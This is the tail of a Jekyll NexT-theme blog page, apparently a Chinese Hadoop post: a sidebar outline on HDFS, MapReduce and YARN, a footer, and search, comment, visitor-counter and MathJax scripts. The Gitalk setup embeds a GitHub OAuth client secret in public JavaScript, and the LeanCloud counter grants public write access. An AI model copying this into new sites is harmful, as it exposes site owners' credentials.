                    <i class="fa fa-fw fa-stack-overflow"></i>
                  
                  StackOverflow
                </a>
              </span>
            
          
        </div>

        
        

        
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            








            
              <div class="post-toc-content">
    <ol class=nav>
      <li class="nav-item nav-level-1"> <a class="nav-link" href="#hdfs"> <span class="nav-number">1</span> <span class="nav-text">HDFS</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#namenode"> <span class="nav-number">1.1</span> <span class="nav-text">NameNode</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#fsimage-editlog"> <span class="nav-number">1.1.1</span> <span class="nav-text">FsImage EditLog</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#secondnamenode"> <span class="nav-number">1.2</span> <span class="nav-text">SecondNameNode</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#datanote"> <span class="nav-number">1.3</span> <span class="nav-text">DataNote</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#读过程"> <span class="nav-number">1.4</span> <span class="nav-text">读过程</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#写过程"> <span class="nav-number">1.5</span> <span class="nav-text">写过程</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#恢复数据"> <span class="nav-number">1.6</span> <span class="nav-text">恢复数据</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#namenode-1"> <span class="nav-number">1.6.1</span> <span class="nav-text">NameNode</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#datanode"> <span class="nav-number">1.6.2</span> <span class="nav-text">DataNode</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#数据"> <span class="nav-number">1.6.3</span> <span class="nav-text">数据</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#局限"> <span class="nav-number">1.7</span> <span class="nav-text">局限</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#高级操作"> <span class="nav-number">1.8</span> <span class="nav-text">高级操作</span> </a> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#mapreduce"> <span class="nav-number">2</span> <span class="nav-text">MapReduce</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#inputformat"> <span class="nav-number">2.1</span> <span class="nav-text">inputformat</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#split"> <span class="nav-number">2.2</span> <span class="nav-text">split</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#block-and-inputsplit"> <span class="nav-number">2.2.1</span> <span class="nav-text">Block and InputSplit</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#map"> <span class="nav-number">2.3</span> <span class="nav-text">map</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#shuffle"> <span class="nav-number">2.4</span> <span class="nav-text">shuffle</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#map-1"> <span class="nav-number">2.4.1</span> <span class="nav-text">map</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#reduce"> <span class="nav-number">2.4.2</span> <span class="nav-text">reduce</span> </a> </li> </ol> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#reduce-1"> <span class="nav-number">2.5</span> <span class="nav-text">reduce</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#mapreduce-优化"> <span class="nav-number">2.6</span> <span class="nav-text">mapreduce 优化</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#数据输入小文件处理"> <span class="nav-number">2.6.1</span> <span class="nav-text">数据输入小文件处理</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#map-2"> <span class="nav-number">2.6.2</span> <span class="nav-text">map</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#reduce-2"> <span class="nav-number">2.6.3</span> <span class="nav-text">reduce</span> </a> </li> <li class="nav-item nav-level-3"> <a class="nav-link" href="#io"> <span class="nav-number">2.6.4</span> <span class="nav-text">IO</span> </a> </li> </ol> </li> </ol> </li> <li class="nav-item nav-level-1"> <a class="nav-link" href="#yarn"> <span class="nav-number">3</span> <span class="nav-text">YARN</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-2"> <a class="nav-link" href="#局限性"> <span class="nav-number">3.1</span> <span class="nav-text">局限性</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#改变"> <span class="nav-number">3.2</span> <span class="nav-text">改变</span> </a> </li> <li class="nav-item nav-level-2"> <a class="nav-link" href="#yarn-1"> <span class="nav-number">3.3</span> <span class="nav-text">yarn</span> </a> <ol class="nav-child"> <li class="nav-item nav-level-3"> <a class="nav-link" href="#一个可运行任何分布式应用程序的集群"> <span class="nav-number">3.3.1</span> <span class="nav-text">一个可运行任何分布式应用程序的集群</span> </a> </li> </ol> </li> </ol> </li>
    </ol>
  </div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>

        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  
  &copy;  2018 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">wyx</span>
</div>


<div class="powered-by">
  由 <a class="theme-link" href="https://jekyllrb.com">Jekyll</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/simpleyyt/jekyll-theme-next">
    NexT.Mist
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>





















  
   
  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery/index.js?v=2.1.3"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  
  
  
  
  <script type="text/javascript" src="/assets/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/assets/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/assets/js/src/motion.js?v=5.1.1"></script>



  
  

  <script type="text/javascript" src="/assets/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/assets/js/src/post-details.js?v=5.1.1"></script>


  


  <script type="text/javascript" src="/assets/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  






<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var labels = ['gitalk','2019-02-20']
</script>

<script type="text/javascript">
    labels.push('big data');
</script>


<script type="text/javascript">
    labels.push('big data');
</script>


<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: 'dd688ffd2be8512fc659',
        clientSecret: '483255bda7b80acb108df487ac91a0be78710b0d',
        repo: '631068264.github.io',
        owner: '631068264',
        admin: ['631068264'],
        id: 'Hadoop',
        title: 'Hadoop',
        labels: labels,
        perPage: 50,
        distractionFreeMode: true
    });
    gitalk.render('gitalk-container');
</script>







  




  

    

  







  


  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("MQfAJm2nTUDaT5bEuS8i4Ygm-gzGzoHsz", "m4tqv3N9AepVgTk0YfSNe9kz");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  


  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

  <!--custom css in _sass/_custom/custom.scss -->

<script type="text/javascript">
    // 黑幕提示语
    $('span.heimu').attr('title', '你知道得太多了');
</script>

<script type="text/javascript">
    // 多图显示 gp-列数
    $('span[class^="gp-"]').each(function () {
        var div_mulp = $(this);
        if (div_mulp && div_mulp.attr('class')) {
            var column_number = parseInt(div_mulp.attr('class').split('-')[1]);
            var image = div_mulp.find('img');
            if (image.size() > 0) {
                div_mulp.removeClass()
                    .addClass('post-gallery')
                    .attr('itemscope', '')
                    .attr('itemtype', 'http://schema.org/ImageGallery');

                image.each(function (index) {
                    var modulo = index % column_number;

                    if (modulo === 0) {
                        content = $('<div class="post-gallery-row"></div>')
                    }
                    var image_src = $(this).attr('src');
                    content.append('<a class="post-gallery-img fancybox"\n' +
                        '                 href="' + image_src + '" rel="gallery_"\n' +
                        '                 itemscope itemtype="http://schema.org/ImageObject" itemprop="url">\n' +
                        '                <img src="' + image_src + '" itemprop="contentUrl"/>\n' +
                        '              </a>');

                    if (modulo === column_number - 1) {
                        div_mulp.append(content)
                    }
                });

                var photo_size_modulo = image.size() % column_number;
                if (photo_size_modulo > 0) {
                    div_mulp.append(content);
                }
                image.remove();
            }
        }
    });


</script>
</body>
</html>

